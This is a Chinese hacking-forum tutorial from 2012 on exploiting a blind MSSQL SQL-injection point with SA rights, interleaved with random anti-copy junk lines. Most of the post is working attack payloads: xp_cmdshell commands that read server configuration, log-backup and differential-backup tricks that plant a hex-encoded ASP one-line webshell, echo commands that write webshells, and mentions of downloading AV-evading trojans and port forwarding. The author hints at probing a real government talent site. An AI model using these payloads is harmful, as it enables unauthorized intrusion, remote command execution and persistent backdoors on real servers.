中国网络渗透测试联盟
标题:
sa权限的教程.
[打印本页]
作者:
admin
时间:
2012-9-15 14:30
标题:
sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
$ N; n. E' q% K: l) o- o
. N2 I7 H$ l C3 p
+ D# g: |( j- {$ P! h% u
欢迎高手访问指导,欢迎新手朋友交流学习。
# E' v- ? K& k
* T& S, T9 k7 Q/ P6 Y; C
2 ^( m' ^& c8 i8 t: h) @2 X
9 p3 w1 Q+ ?# F2 {8 X; l
论坛:
http://www.90team.net/
, l: N, H2 K# F( N1 {- E% }
" P! a6 b0 {- [( `
( F& r! v; H' n2 P
* y- f* o0 k A0 |6 d7 A5 \
友情检测国家人才网
$ I9 e, o& r' ?7 c
3 d+ B0 @6 C: E, w. T+ ~+ P, U
8 z: M" s; ]$ U4 {, ~4 ?# s8 H" n
内容:MSSQL注入SA权限不显错模式下的入侵
3 A9 C. D6 r7 n4 L% |; d: o1 _7 R
( ?0 w5 e7 o" E3 [2 j8 Q3 T
, J, @; S6 [, [3 U: v! Z
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
0 R8 y; t. X" _9 @; l( P: P" o
1 g$ `( |/ L! z# r; x; H4 B
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
( Y9 j" q P |
4 U) L' t( L# t, ^! X; c1 N" q! b
9 j4 w. b) u# R4 u P: _* m
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
# z ~& \. [4 p, H# q. f/ S$ Y
/ ~* I- B7 K* P
思路:
, u& w8 S. F6 d+ N5 X
$ i) L( d% O0 T, v' M A* ]: G
首先:
) ^. j& n, e& F8 ^; }" e
+ T! G' P$ A$ X) g. G. A. R
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
; g0 g) R. G+ L w x
" ?/ x/ @/ Z' O; s4 ?
1.日志备份获得Webshell
1 N$ r/ g% l' D7 r7 Z1 N+ ?, ?
$ k5 @/ M. \* G8 C* J% [" L9 {# r
2.数据库差异备份获得Webshell
7 ^, o& v' k7 H& b/ \; x
" W) G) G" `: \+ r
4.直接下载免杀远控木马。
, }- ?( f8 K* H* P4 b
1 n0 N- k/ G0 y, H2 n& m2 \' c5 P
5.直接下载LCX将服务器端口转发出来
2 L, Y1 c0 E, P/ ?6 w; M
! L$ x/ v3 a/ E) T0 r( }& R
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
5 R t6 A2 k. F- a9 p" ~- g Y7 w
( r$ @0 i8 w6 v4 ~
! L* U% P! q% U
8 S3 U4 Y9 {/ w0 E/ D9 P
在这里我就不浪费大家时间了,我已经测试过 日志备份和 数据库差异备份 都没有成功 我就不演示了。 直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
* b. k T& `* v% f# o5 c1 X
9 U0 H' y, g6 V& ?( J. c
我直接演示后面一个方法
5 O3 ~8 X3 j2 A& _6 p9 U3 M
/ T- H! K5 K4 i
" h. c/ p2 T: W2 i5 V% k
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
$ c/ i1 u; r( {( B% i f
: f1 [3 ^# M/ i5 o; M. |
: b0 s' \ J# r6 n
* A: L, o0 z* E+ ]% F5 ?) x" p+ T
5 V% s: b# Y& T# n" l4 R
◆日志备份:
' l* w1 ?, ^ c7 M3 b
/ A J1 D! P6 d1 E
$ U M7 z- ~/ }5 _& e# X5 q
1. 进行初始备份
2 |; q B8 ?% H4 T; D3 q3 F2 N
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
4 \! |4 X' U Q- H$ V$ b& N% ]( D
7 Z a( l5 ^* a- T+ C
2. 插入数据
/ [2 p: ^& u; z8 ^" D
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
8 p! I3 W1 p `3 i
/ I G' ] I8 Z$ T1 N3 G0 @" \- ~2 J
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
8 q& F) p! m8 `, [
! C( ?- S2 \: N9 v6 v
3. 备份并获得文件,删除临时表
4 ^2 S1 \, _8 S% N3 t
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
) Z" |' e; g2 M* A5 O
; Q$ _$ L: d! V9 ?/ L
7 N- }/ h% ]' m: @ ^7 y% l
# Y |/ |, U, M
◆数据库差异备份
2 _9 }, Z* o% g3 M# t$ z, {6 W
- d3 i/ N) m( P( B3 {( V' V
(1. 进行差异备份准备工作
" Q9 ]9 ?5 n: @: o8 Q+ \/ C
) h/ {$ o0 m7 Q7 P1 A0 U
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
) ]5 L; E, y8 ?# E5 M
0 t( e2 K! c4 E$ f0 c
上面的 0x633A5C746573742E617370 是 c:\test.asp 路径转换后的16进制编码
, S% p4 w; a k: l* \; z1 E
$ z/ n1 B5 C1 V: |: S
1 N) v2 ~% T- `! e/ G q
(2. 将数据写入到数据库
8 q( e* C2 q4 e: _1 Y, O
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
: ~9 }$ }' E% u: _4 S# O" ^
2 K, o4 F' V# O
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
, T; m2 ]& C( M7 _. m/ b
7 M" v! V6 F0 }$ a2 L0 g+ G" H4 J
3. 备份数据库并清理临时文件
! g$ s% p* S" x" {5 l5 O3 ] h9 c
1 Y% X3 o( |5 k
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
X; f4 @: p7 @4 C# F* b
# z1 c# w% A# C1 E
0x633A5C746573742E617370 为 c:\test.asp 删除临时文件
+ F D) `4 l' U2 E1 ~# C
, f( j. t7 a( J# j- q' ?3 A4 U
" }+ G1 c5 h! B1 @
: n! H* A6 G) ~: F: h
用^转义字符来写ASP(一句话木马)文件的方法:
0 a& A; t) F t
( E8 G/ |0 A8 c# ~+ t% e
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
$ S$ p& j- K; m6 v6 l ?( M* Q9 S
& G' g4 }& J! ?4 G1 |" d2 l
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
$ R d4 _! n5 k7 m# Z4 o
# E# A4 R4 o: _8 s& }2 {% g3 t
读取IIS配置信息获取web路径
5 X7 j9 n4 d1 W1 h4 g) q. F3 o
" X+ s, S* z! C! Y Z* m5 S
% Z9 I0 c1 d" @& u8 ^) m @. i
注入点后面执行 ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
. b$ {# Z9 h+ i) k+ p9 t
) Z$ _! o0 t* Y# i# L1 c7 L/ T9 d9 t
执行命令
2 X' A6 ~+ ^& C2 `. @
6 r& ~1 ?& z6 L6 G4 {4 T
注入点后面执行 ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
& ~$ a; M) L) S& t$ u. b: S
! }+ }" s+ n. B* q4 x7 l
" j# l' ^+ b) x; G
4 o5 w; m4 W. e9 q: Z6 q7 T
! E3 ^$ Z7 f( j
/ i/ \- P& [7 X" R
7 k" ~2 s) j2 X: I+ n" m
" `2 I. d; k( O- h& y V
[* [$ r6 a5 z9 S
5 h: } H+ b5 X
+ x, B) \5 m( z, m4 p
/ Y7 F* p7 |% T( |4 P# P1 t/ F
. `3 o- p: \' b, D9 t% m1 {
7 I1 W6 U4 y$ N5 |2 F; ~5 `
6 y. _* R; Z8 J# d I' G% ?
. S& a! i3 N+ u- ]$ @0 ]
; S* D% J6 K7 X4 m u
; b8 A" l( q" r0 a* w9 i
# A6 T/ }" @. \& c0 Z2 D
4 [$ A2 C& ]) T: [5 e/ `5 Q. h
& Z1 }! L5 }/ G' G0 }2 w
% ^! E- D; J7 I. e1 [& R! J5 }
6 q0 Y. D0 X7 n' E; }3 r4 d6 ^2 Y6 |
3 G, O' p9 p7 d+ l; c$ s
, Q7 n# d( q$ n9 {" t; q
" Y( k6 N- u4 U7 Q' F9 G
& b* \4 ^/ u* v
- ?) Y* N- R/ h0 z, z
, N6 Q$ Q. }# U& d4 {; R7 Q9 I( J
8 e4 ]) X) }: `
. y0 G# [) X8 G- @- H
# |6 O# f8 V4 Y0 O5 k
* n0 j. [; O M( l
5 p& T" n. a5 Y+ v, \6 j
& B! W- E6 ~- z0 v; e, x5 U
% W3 B/ g4 H5 K" L9 @4 F
* h3 n- {- g9 k( m) j6 a2 s' |7 s
. w( `; Y7 o5 A
6 M$ R4 t4 h7 ~4 B0 x: D( S4 \4 u$ Q
2 G4 t/ K; t5 }
/ c1 w6 d @$ ^. H5 M
+ [$ }6 F6 g1 C
: t& d3 N3 W- E9 D' B, R k! a
8 t8 v* ~1 I# y# ^. M8 V
% T1 h; j$ X( j5 b$ m/ L
8 _4 m7 J; |9 A- ?! W, O6 C
, Z4 ^2 k7 x& _: f+ T- t9 A5 x/ s) d
9 H3 D. f9 ^( L8 \5 r( N
# H, g& [9 x, n, }6 \8 C5 d1 F
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2